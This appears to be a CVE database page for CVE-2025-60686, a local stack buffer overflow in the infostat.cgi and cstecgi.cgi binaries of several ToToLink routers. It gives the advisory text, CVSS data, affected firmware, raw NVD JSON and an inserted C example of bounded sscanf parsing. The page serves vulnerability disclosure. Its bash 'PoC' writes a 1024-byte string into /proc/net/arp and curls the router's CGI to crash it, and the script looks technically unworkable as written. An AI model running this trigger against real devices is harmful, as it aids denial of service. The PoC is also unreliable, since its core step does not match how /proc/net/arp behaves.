Security Vulnerability Report
CVE-2025-60686 CVSS 5.1 MEDIUM

CVE-2025-60686

Published: 2025-11-13 16:15:53
Last Modified: 2025-11-19 17:41:29

Description

A local stack-based buffer overflow vulnerability exists in the infostat.cgi and cstecgi.cgi binaries of ToToLink routers (A720R V4.1.5cu.614_B20230630, LR1200GB V9.1.0u.6619_B20230130, and NR1800X V9.1.0u.6681_B20230703). Both programs parse the contents of /proc/net/arp using sscanf() with "%s" format specifiers into fixed-size stack buffers without length validation. Specifically, one function writes user-controlled data into a single-byte buffer, and the other into adjacent small arrays without bounds checking. An attacker who controls the contents of /proc/net/arp can trigger memory corruption, leading to denial of service or potential arbitrary code execution.
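The bounded counterpart of the parsing pattern described above, as an added example (not code from the ToToLink firmware or from the advisory). The `arp_entry` struct, `is_mac` and `parse_arp_line` are hypothetical names, and the sample line is constructed.

```c
#include <ctype.h>
#include <stdio.h>
#include <string.h>

/* Hypothetical record type for this example; not taken from the firmware. */
struct arp_entry {
    char ip[17];   /* 15-char dotted quad + 1 spare byte to detect overlong input + NUL */
    char mac[19];  /* 17-char MAC + 1 spare byte + NUL */
    char dev[17];  /* 15-char interface name + 1 spare byte + NUL */
};

/* Accept only the xx:xx:xx:xx:xx:xx form. */
static int is_mac(const char *s)
{
    if (strlen(s) != 17) return 0;
    for (int i = 0; i < 17; i++) {
        if (i % 3 == 2) { if (s[i] != ':') return 0; }
        else if (!isxdigit((unsigned char)s[i])) return 0;
    }
    return 1;
}

/*
 * Unsafe pattern of the kind the description refers to (comment only):
 *     sscanf(line, "%s %s %s %s %s %s", ip, type, flags, mac, mask, dev);
 * Bounded form: every stored %s has a width of sizeof(buf) - 1, unused
 * columns are skipped with %*s, and the conversion count is checked.
 * Returns 0 on success, -1 if the line is malformed or a field is too long.
 */
int parse_arp_line(const char *line, struct arp_entry *e)
{
    memset(e, 0, sizeof *e);
    if (sscanf(line, "%16s %*s %*s %18s %*s %16s", e->ip, e->mac, e->dev) != 3)
        return -1;
    /* A token that reached the spare byte was longer than the field allows. */
    if (strlen(e->ip) > 15 || strlen(e->dev) > 15 || !is_mac(e->mac))
        return -1;
    return 0;
}

int main(void)
{
    struct arp_entry e;
    /* Constructed sample line in /proc/net/arp column order. */
    const char *ok = "192.168.1.100 0x1 0x2 aa:bb:cc:dd:ee:ff * eth0";
    printf("%d %s %s %s\n", parse_arp_line(ok, &e), e.ip, e.mac, e.dev);
    return 0;
}
```

Rejecting the line instead of silently truncating matters here: a width-limited `%s` leaves the rest of an overlong token for the next conversion, so the remaining columns would otherwise shift.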

CVSS Details

CVSS Score: 5.1
Severity: MEDIUM
CVSS Vector: CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:L

Configurations (Affected Products)

cpe:2.3:o:totolink:a720r_firmware:4.1.5cu.614_b20230630:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:h:totolink:a720r:-:*:*:*:*:*:*:* - NOT VULNERABLE
cpe:2.3:o:totolink:lr1200gb_firmware:9.1.0u.6619_b20230130:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:h:totolink:lr1200gb:-:*:*:*:*:*:*:* - NOT VULNERABLE
cpe:2.3:o:totolink:nr1800x_firmware:9.1.0u.6681_b20230703:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:h:totolink:nr1800x:-:*:*:*:*:*:*:* - NOT VULNERABLE
ToToLink A720R < V4.1.5cu.614_B20230630
ToToLink LR1200GB < V9.1.0u.6619_B20230130
ToToLink NR1800X < V9.1.0u.6681_B20230703

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
bash
#!/bin/bash
# CVE-2025-60686 PoC - ToToLink Router Local Stack Buffer Overflow
# This PoC demonstrates writing a long string to /proc/net/arp to trigger buffer overflow

# Generate a long string to overflow the stack buffer
# The buffer size is unknown but we generate a long string to trigger overflow
LONG_STRING=$(python3 -c "print('A' * 1024)")

# Backup original /proc/net/arp
cp /proc/net/arp /tmp/arp_backup

# Create malicious ARP entry with oversized data
echo "192.168.1.100 0x1 0x2 "$LONG_STRING" * eth0" > /proc/net/arp

# Trigger the vulnerable CGI script
echo "Triggering infostat.cgi..."
curl -s http://192.168.1.1/cgi-bin/infostat.cgi 2>/dev/null || echo "Service may be down"

# Restore original ARP table
mv /tmp/arp_backup /proc/net/arp
echo "PoC execution completed"

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-60686", "sourceIdentifier": "[email protected]", "published": "2025-11-13T16:15:52.590", "lastModified": "2025-11-19T17:41:28.740", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "A local stack-based buffer overflow vulnerability exists in the infostat.cgi and cstecgi.cgi binaries of ToToLink routers (A720R V4.1.5cu.614_B20230630, LR1200GB V9.1.0u.6619_B20230130, and NR1800X V9.1.0u.6681_B20230703). Both programs parse the contents of /proc/net/arp using sscanf() with \"%s\" format specifiers into fixed-size stack buffers without length validation. Specifically, one function writes user-controlled data into a single-byte buffer, and the other into adjacent small arrays without bounds checking. An attacker who controls the contents of /proc/net/arp can trigger memory corruption, leading to denial of service or potential arbitrary code execution."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:L", "baseScore": 5.1, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "availabilityImpact": "LOW"}, "exploitabilityScore": 2.5, "impactScore": 2.5}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-121"}]}], "configurations": [{"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:totolink:a720r_firmware:4.1.5cu.614_b20230630:*:*:*:*:*:*:*", "matchCriteriaId": "BCA249C9-68D4-48FE-B0CA-77ECF53DDE3B"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:h:totolink:a720r:-:*:*:*:*:*:*:*", "matchCriteriaId": 
"A1DE5168-B787-462C-B024-2B8F73759034"}]}]}, {"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:totolink:lr1200gb_firmware:9.1.0u.6619_b20230130:*:*:*:*:*:*:*", "matchCriteriaId": "00F36DE9-D043-4C8B-9EF9-8DA669589E85"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:h:totolink:lr1200gb:-:*:*:*:*:*:*:*", "matchCriteriaId": "8442849E-5B06-41A1-8DA8-827FBD7A34E5"}]}]}, {"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:totolink:nr1800x_firmware:9.1.0u.6681_b20230703:*:*:*:*:*:*:*", "matchCriteriaId": "7F9DCAA5-1EC6-44A1-9606-B6FBF29DEC65"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:h:totolink:nr1800x:-:*:*:*:*:*:*:*", "matchCriteriaId": "B4D2D0E8-2678-4238-8229-83450ECA1153"}]}]}], "references": [{"url": "http://totolink.com", "source": "[email protected]", "tags": ["Broken Link"]}, {"url": "https://github.com/yifan20020708/SGTaint-0-day/blob/main/ToToLink/ToToLink-A720R/CVE-2025-60686.md", "source": "[email protected]", "tags": ["Exploit", "Third Party Advisory"]}, {"url": "https://www.totolink.net/", "source": "[email protected]", "tags": ["Product"]}]}}